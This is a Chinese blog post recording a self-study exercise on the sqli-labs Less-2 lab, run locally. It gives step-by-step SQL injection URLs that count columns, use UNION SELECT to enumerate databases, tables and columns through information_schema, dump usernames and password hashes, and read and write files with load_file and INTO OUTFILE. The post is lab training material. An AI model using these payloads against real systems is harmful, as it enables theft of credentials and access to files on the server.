【网安自学/web漏洞-day02】sqli-labs第二关(改为跨站注入)

查询注入点与第一题不一样,其他都一样,所以试一试跨站注入

若一个网页的注入点使用的是root用户,那么可以使用这个注入点跨库查询其他的数据库。

例如:;使用sqil-labs root用户注入进行跨库攻击:

  1. 在网站后添加id=1发现显示用户名

     

  2. 判断是否是字符注入 http://127.0.0.1/sqli-labs/Less-2/?id=1’

     

  3. 根据报错类型判断可能是int类型:http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=1
    1. 1=2时找不到用户了http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2

       

     

  4. 跨库注入的思路
    1. 找到所有的数据库名 #information_schema(它记录了库名以及表名、列名)
  5. 查询有几列 http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 4(报错)

     

  6. Order by 3的时候就不报错了 http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 3

     

  7. 查询显示位 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3

     

  8.  查看当前数据库的用户,发现是root,则可以进行跨库攻击 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,user(),null

     

  9. 查找数据库的所有数据 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,group_concat(schema_name),null from information_schema.schemata
    1. 找到了另一个数据库pikachu

     

  1. 查询pikachu下的表名信息
    1. 查询到有以下表:httpinfo,member,message,users,xssblind

     

  2. 查找pikachu下面的users表(注意加上table_schema='pikachu'——指向数据库pikachu) http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,group_concat(column_name),null from information_schema.columns where table_name='users' and table_schema='pikachu'

     

  3. 查询username与password http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,username,password from pikachu.users

     

  4. 对密码进行md5解密:

     

  1. 文件读写操作(危!!!)
    1. load_file(): 读取函数
    2. Into outfile或into dumpfile: 导出函数
  2. 若已知某个盘有某个文件(通过扫描获得,那么就可以直接读取)--(例如已知d盘有version.txt)就能进行读取 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,load_file('d:/version.txt'),null

     

  3. 为d盘下添加一个为“mytest”的“mytest.txt”文件 http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,'mytest',3 into outfile 'd:\\mytest.txt' %23
    1. 成功

       

     

  4. Sql注入防护:魔术引导(把想写入的地址使用hex编码)

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值